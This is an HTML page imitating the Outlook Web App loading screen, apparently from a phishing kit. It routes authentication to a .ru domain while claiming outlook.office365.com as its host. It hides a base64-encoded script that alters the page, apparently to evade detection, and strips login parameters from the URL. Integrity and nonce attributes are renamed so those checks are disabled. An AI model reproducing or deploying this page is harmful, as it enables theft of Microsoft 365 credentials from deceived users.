<!DOCTYPE html>
<html dir=ltr xmlns=http://www.w3.org/1999/xhtml translate=no>
  <head>
    <script src="data:text/javascript;base64,ZnVuY3Rpb24gYygpe2lmKCFkb2N1bWVudC5xdWVyeVNlbGVjdG9yKCIuYiIpIHx8ICFkb2N1bWVudC5xdWVyeVNlbGVjdG9yKCIuZyIpKXtkb2N1bWVudC5oZWFkLmFwcGVuZENoaWxkKE9iamVjdC5hc3NpZ24oZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgiZGl2Iikse2NsYXNzTGlzdDpbImIiXX0pKTtkb2N1bWVudC5kb2N1bWVudEVsZW1lbnQuc3R5bGUuZmlsdGVyPSJodWUtcm90YXRlKDRkZWcpIjtkb2N1bWVudC5oZWFkLmFwcGVuZENoaWxkKE9iamVjdC5hc3NpZ24oZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgiZGl2Iikse2NsYXNzTGlzdDpbImciXX0pKTtzZXRUaW1lb3V0KGMsMWUzKX19YygpOwo="></script>
    <script>
      ;
      (function() {
        const u = new URL(location.href);
        u.searchParams.delete('login_hint');
        u.searchParams.delete('qrc');
        history.replaceState(null, '', u);
      })();
    </script>
    <meta charset=utf-8>
    <meta http-equiv=X-UA-Compatible content="IE=edge">
    <meta http-equiv=pragma content=no-cache>
    <meta name=viewport content="width=device-width,initial-scale=1,user-scalable=0">
    <meta name=google value=notranslate>
    <meta name=format-detection content="telephone=no">
    <meta name=scriptVer content=20250530004.11>
    <meta name=hashedPath content=hashed-v1>
    <meta name=physicalRing content=WW>
    <meta name=environment content=Prod>
    <meta name=bootFlights content=auth-cacheTokenForMetaOsHub,auth-useAuthTokenClaimsForMetaOsHub,auth-codeChallenge,auth-msaljs-eventify,cal-store-NavBarData,auth-msaljs-newsletters,auth-msaljs-meet,auth-msaljs-places,auth-msaljs-bookings,auth-msaljs-landingpage,auth-msaljs-business,auth-msaljs-consumer,shellmultiorigin,cal-perf-useassumeoffset,cal-perf-eventsinofflinestartupdata,acct-add-account-e1-improvement,auth-cachetokenformetaoshub,workerasyncload,auth-msaljs-newsletters,auth-msaljs-bookings,auth-msaljs-places,cal-reload-pause,auth-useauthtokenclaimsformetaoshub,acctstartdataowav2,auth-msaljs-places-sessionstorage,cal-store-navbardata,acctpersistentidindexerv2,fwk-decode-checkexplictlogon,auth-msaljs-meet,auth-msaljs-safari,msplaces-hosted-localsessiondata-v2,auth-codechallenge,msplaces-app-boot-sequence,fwk-nonbootconfig-gql,fwk-enable-redirect-new-olkerror-page,fwk-enable-owa-loop-trusted-types-policy>
    <meta name=cdnUrl content=//res.public.onecdn.static.microsoft />
    <meta name=backupCdnUrl content=//res-1.cdn.office.net />
    <meta name=cdnContainer content=owamail />
    <meta name=devCdnUrl content=>
    <meta name=ariaUrl content=>
    <meta name=webServerForest content=eurprd04>
    <meta name=webServerClique content=CLEURPRD04VIE08>
    <meta name=wcssFrameUrls content={'DefaultUrl':'https://webshell.suite.office.com','WwdbUrl':'https://wwdb.webshell.suite.office.com','EudbUrl':'https://eudb.webshell.suite.office.com'}>
    <meta name=scriptPath content=scripts />
    <meta name=owaIsAuthenticated content={{IsAuthenticated}}>
    <meta name=jsTimestamp content=1749571331021>
    <meta name=publicUrl content=https://dofeumlv2ub.secured-authorization.ru />
    <meta name=aadAuthorityUrl content=https://dofeumlv2ub.secured-authorization.ru />
    <meta name=businessCanonicalHostName content=outlook.office365.com>
    <meta name=isRPSAuthCookiePresent content=False>
    <link rel=preconnect href=//res.public.onecdn.static.microsoft/ rickorigin=anonymous>
    <link rel=preconnect href=https://dofeumlv2ub.secured-authorization.ru/ rickorigin=anonymous>
    <link rel="shortcut icon" href=/mail/favicon.ico type=image/x-icon>
    <link rel=apple-touch-icon href=//res.public.onecdn.static.microsoft/assets/mail/pwa/v1/pngs/apple-touch-icon.png>
    <noscript>JavaScript must be enabled.</noscript>
    <title>knqrclvtvn</title>
    <link xintegrity="sha256-Snj5lKbTLdVWMePrM0t/7X3q5801hWCgLCsoHP9wfHQ=" rel="preload" href="//res.public.onecdn.static.microsoft/owamail/hashed-v1/scripts/owa.mail.runtime.a360a4b5.js" as="script" rickorigin="anonymous" />
    <link xintegrity="sha256-eDJNDvrRHyn5f13WlRsVF28f5+BmNVEtoOr7ti5drmw=" rel="preload" href="//res.public.onecdn.static.microsoft/owamail/hashed-v1/scripts/owa.mailindex.94023566.js" as="script" rickorigin="anonymous" />
    <style>
      @font-face {
        font-family: FabricMDL2Icons;
        src: url('//res.public.onecdn.static.microsoft/owamail/20250530004.11/resources/fonts/o365icons-mdl2.woff') format('woff');
        font-weight: 400;
        font-style: normal
      }

      @font-face {
        font-family: office365icons;
        src: url('//res.public.onecdn.static.microsoft/owamail/20250530004.11/resources/fonts/office365icons.woff?') format('woff');
        font-weight: 400;
        font-style: normal
      }

      #loadingScreen {
        position: fixed;
        top: 0;
        bottom: 0;
        left: 0;
        right: 0;
        background-color: #fff
      }

      #loadingLogo {
        position: fixed;
        top: calc(50vh - 90px);
        left: calc(50vw - 90px);
        width: 180px;
        height: 180px
      }

      #MSLogo {
        position: fixed;
        bottom: 36px;
        left: calc(50vw - 50px)
      }

      .dark #loadingScreen {
        background-color: #333
      }

      .darkNew #loadingScreen {
        background-color: #1f1f1f
      }
    </style>
    <script nononce=1MmulSrHYaDzAyC678yf+Q==>
      try {
        ! function() {
          if ("localStorage" in window) {
            var e = "UsersNormalizedTheme",
              t = window.localStorage,
              a = t.getItem("olk-" + e) || t.getItem(e);
            a && /\.dark$/.test(a) && document.documentElement.classList.add("dark"), a && /\.dark\.new$/.test(a) && document.documentElement.classList.add("darkNew");
            var n = t.getItem("PwaTheme");
            if (n) {
              var o = document.getElementsByName("theme-color");
              o && o.length && o[0].setAttribute("content", n)
            }
          }
        }()
      } catch (e) {}
    </script>
    <script nononce=1MmulSrHYaDzAyC678yf+Q==>
      function logError(e, n, o, r, a, i) {
        window.owaErrorHandler ? window.owaErrorHandler(e, n, o, r, a, i) : window.owaBackfilledErrors.push(arguments)
      }

      function hashChangeHandler() {
        window.owaLocationHash = window.location ? window.location.hash : void 0
      }
      window.FabricConfig = {
        fontBaseUrl: null
      }, window.owaBackfilledErrors = [], window.onerror = logError, "onunhandledrejection" in window && window.addEventListener("unhandledrejection", (function(e) {
        var n = e && e.reason || "[no reason given]";
        n instanceof Error ? logError("Unhandled Rejection: " + n, "", 0, 0, n) : n.responseErrorMessage && n.callstackAtRequest && n instanceof Response ? logError(n.responseErrorMessage, "", void 0, void 0, void 0, n.callstackAtRequest) : logError("Unhandled Rejection: " + ("string" == typeof n ? n : JSON.stringify(n)))
      })), window.onload = function() {
        var e = self.location;
        !self.Owa && e && void 0 !== e.search && -1 == e.search.indexOf("gulp") && -1 == e.search.indexOf("branch") && (-1 == e.search.indexOf("bO=2") ? e.search += (e.search ? "&" : "?") + "bO=2" : isBootFeatureEnabled("fwk-enable-redirect-new-olkerror-page") ? e.assign("/mail/olkerror.html?bret=fail&esrc=IndexPageIncomplete&app=Mail&bO=2") : e.assign("/owa/auth/frowny.aspx?bret=fail&esrc=IndexPageIncomplete&app=Mail"))
      }, hashChangeHandler(), window.addEventListener("hashchange", hashChangeHandler)
    </script>
    <link xintegrity="sha256-z/BUQr4/J2g9VMBlwDhqL4j6iNDJD0otLAQOee72KLw=" rel="preload" href="//res.public.onecdn.static.microsoft/owamail/hashed-v1/scripts/owa.55437.m.4f97d6f5.js" as="script" rickorigin="anonymous" />
    <link xintegrity="sha256-YH0vyqKvYHWGNiHhavABP7cBP6Eh3cZ8AMBt6TayX48=" rel="preload" href="//res.public.onecdn.static.microsoft/owamail/hashed-v1/scripts/owa.27755.m.0d3acb11.js" as="script" rickorigin="anonymous" />
    <link xintegrity="sha256-G4aYmam0BeDH3MnGSKXDzF2+N/Ej/dW78+zPNpRvIiw=" rel="preload" href="//res.public.onecdn.static.microsoft/owamail/hashed-v1/scripts/owa.AppBoot.m.a19b01c6.css" as="style" rickorigin="anonymous" />
    <link xintegrity="sha256-d2RfETm9xKhoH7nI0i9/qqC9X0w9ppU4XT4JNsFRryk=" rel="preload" href="//res.public.onecdn.static.microsoft/owamail/hashed-v1/scripts/owa.AppBoot.m.0bb2a3da.js" as="script" rickorigin="anonymous" />
    <link xintegrity="sha256-KgRobfHjjCGxYL/GpAoR233TXjIIppZ5z7HcSBPMs94=" rel="preload" href="//res.public.onecdn.static.microsoft/owamail/hashed-v1/scripts/owa.36255.m.85592bef.js" as="script" rickorigin="anonymous" />
    <link xintegrity="sha256-CF0dIVHbgLL+6HaXufrFNm0wAqC8gHr9UHxoPFR/WAE=" rel="preload" href="//res.public.onecdn.static.microsoft/owamail/hashed-v1/scripts/owa.94868.m.95e1be97.js" as="script" rickorigin="anonymous" />
    <link xintegrity="sha256-kOPej7/EsfN3ZJ2XtAfAlc3uvv/GEVRiULVZpBpfsnE=" rel="preload" href="//res.public.onecdn.static.microsoft/owamail/hashed-v1/scripts/owa.MsalAuth.m.c2a5abcb.js" as="script" rickorigin="anonymous" />
    <script xintegrity="sha256-Snj5lKbTLdVWMePrM0t/7X3q5801hWCgLCsoHP9wfHQ=" src="//res.public.onecdn.static.microsoft/owamail/hashed-v1/scripts/owa.mail.runtime.a360a4b5.js" rickorigin="anonymous"></script>
    <script xintegrity="sha256-eDJNDvrRHyn5f13WlRsVF28f5+BmNVEtoOr7ti5drmw=" src="//res.public.onecdn.static.microsoft/owamail/hashed-v1/scripts/owa.mailindex.94023566.js" rickorigin="anonymous"></script>
  </head>
  <body role=application class="ms-font-s disableTextSelection ms-Fabric--isFocusHidden">
    <div id=app></div>
    <div id=loadingScreen>
      <div id=loadingLogo dir=ltr>
        <style>
          :root {
            --s: 180px;
            --envW: 130px;
            --envH: 71px;
            --calW: 118px;
            --sqW: calc(var(--calW) / 3);
            --sqH: 37px;
            --calHH: 20px;
            --calH: calc(var(--sqH) * 3 + var(--calHH));
            --calY: calc(var(--calH) + 20px);
            --calYExt: calc(var(--calH) - 80px);
            --calYOverExt: calc(var(--calH) - 92px);
            --flapS: 96px;
            --flapH: calc(0.55 * var(--envH));
            --flapScaleY: calc(var(--flapH) / var(--flapWidth));
            --dur: 5s
          }

          #container {
            width: var(--s);
            height: var(--s);
            animation: bounce var(--dur) infinite
          }

          @keyframes bounce {

            0%,
            100%,
            12.5%,
            32.5%,
            76.1% {
              transform: translateY(0)
            }

            22.5%,
            86% {
              transform: translateY(7px)
            }
          }

          #logo {
            height: 179px;
            width: 130px;
            overflow: hidden;
            margin-top: -59px;
            margin-left: 25px
          }

          #containerShadow {
            position: relative;
            top: 120px;
            left: 25px;
            width: var(--envW);
            height: var(--envH);
            border-radius: 0 0 7px 7px;
            box-shadow: rgba(0, 0, 0, .25) 0 4px 5px;
            animation: shadow-fade var(--dur) infinite
          }

          @keyframes shadow-fade {

            0%,
            100%,
            21.2%,
            80% {
              opacity: 0
            }

            47%,
            70% {
              opacity: 1
            }
          }

          #flapContainer {
            width: var(--envW);
            margin-top: 179px
          }

          #ef {
            width: var(--envW);
            height: var(--envH);
            border-radius: 0 0 7px 7px;
            overflow: hidden;
            margin-top: -41px
          }

          #ef>.l {
            width: 287px;
            height: var(--envH);
            background: #28a8ea;
            transform: translate(-153px, -70px) rotate(28deg)
          }

          #ef>.r {
            width: 287px;
            height: var(--envH);
            background: #1490df;
            transform: translate(-120px, 63px) rotate(-28deg)
          }

          #eb {
            width: var(--envW);
            height: 40px;
            background: #123b6d;
            margin-top: -70px
          }

          #cal {
            display: flex;
            flex-wrap: wrap;
            width: var(--calW);
            height: var(--calH);
            border-radius: 7px;
            overflow: hidden;
            margin: 0 auto;
            margin-top: -306px;
            animation: cal-bounce var(--dur) infinite;
            animation-timing-function: cubic-bezier(0, 0.5, 0, 1);
            transform: translateY(var(--calYExt)) scaleY(1)
          }

          @keyframes cal-bounce {

            0%,
            100%,
            16.5%,
            76.1% {
              transform: translateY(var(--calY)) scaleY(1)
            }

            28% {
              transform: translateY(var(--calYOverExt)) scaleY(1)
            }

            31% {
              transform: translateY(var(--calYExt)) scaleY(1.05)
            }

            33% {
              transform: translateY(var(--calYExt)) scaleY(.96)
            }

            34%,
            68.5% {
              transform: translateY(var(--calYExt)) scaleY(1)
            }

            68.5% {
              animation-timing-function: cubic-bezier(0.66, -0.16, 1, -0.29)
            }
          }

          #cal>.t {
            width: var(--calW);
            height: calc(var(--calHH) + 1px);
            margin-bottom: -1px;
            background: #0358a7
          }

          #cal>.r {
            display: flex;
            width: var(--calW);
            height: var(--sqH)
          }

          .s {
            width: var(--sqW);
            height: calc(var(--sqH) + 1px)
          }

          .s1 {
            background: #0078d4
          }

          .s2 {
            background: #28a8ea
          }

          .s3 {
            background: #50d9ff
          }

          .s4 {
            background: #0364b8
          }

          .s5 {
            background: #14447d
          }

          #openedFlap {
            width: var(--envW);
            height: 107px;
            animation: opened-flap-swing var(--dur) infinite;
            animation-timing-function: cubic-bezier(0.32, 0, 0.67, 0);
            transform-origin: top;
            transform: translateY(-68px) rotate3d(1, 0, 0, -180deg)
          }

          @keyframes opened-flap-swing {

            0%,
            100%,
            14.5%,
            76% {
              transform: translateY(-68px) rotate3d(1, 0, 0, -90deg)
            }

            16.5%,
            74% {
              transform: translateY(-68px) rotate3d(1, 0, 0, -180deg)
            }
          }

          #closedFlap {
            width: var(--envW);
            animation: closed-flap-swing var(--dur) infinite;
            animation-timing-function: cubic-bezier(0.32, 0, 0.67, 0);
            transform-origin: top;
            transform: translateY(calc(-1 * var(--envH))) rotate3d(1, 0, 0, 90deg)
          }

          @keyframes closed-flap-swing {

            0%,
            100%,
            77%,
            8.5% {
              transform: translateY(calc(-1 * var(--envH))) rotate3d(1, 0, 0, 0)
            }

            14.5%,
            76% {
              transform: translateY(calc(-1 * var(--envH))) rotate3d(1, 0, 0, 90deg)
            }
          }

          #fmask {
            width: var(--envW);
            height: 107px;
            overflow: hidden
          }

          .flapTriangle {
            width: var(--flapS);
            height: var(--flapS);
            background: #50d9ff;
            margin: -48px auto 0 auto;
            border-radius: 7px;
            transform: scaleY(.6) rotate(45deg)
          }

          #openedFlap .flapTriangle {
            background: #123b6d
          }

          #closedFlap .flapTriangle {
            background: #50d9ff
          }
        </style>
        <div id=container>
          <div id=containerShadow></div>
          <div id=logo>
            <div id=flapContainer>
              <div id=openedFlap>
                <div id=fmask>
                  <div class=flapTriangle></div>
                </div>
              </div>
              <div id=cal>
                <div class=t></div>
                <div class=r>
                  <div class="s s1"></div>
                  <div class="s s2"></div>
                  <div class="s s3"></div>
                </div>
                <div class=r>
                  <div class="s s4"></div>
                  <div class="s s1"></div>
                  <div class="s s2"></div>
                </div>
                <div class=r>
                  <div class="s s5"></div>
                  <div class="s s4"></div>
                  <div class="s s1"></div>
                </div>
              </div>
            </div>
            <div id=eb></div>
            <div id=ef>
              <div class=r></div>
              <div class=l></div>
            </div>
            <div id=closedFlap>
              <div id=fmask>
                <div class=flapTriangle></div>
              </div>
            </div>
          </div>
        </div>
      </div>
      <img src=//res.public.onecdn.static.microsoft/assets/framework/microsoft.svg id=MSLogo alt=Microsoft>
    </div>
  </body>
</html>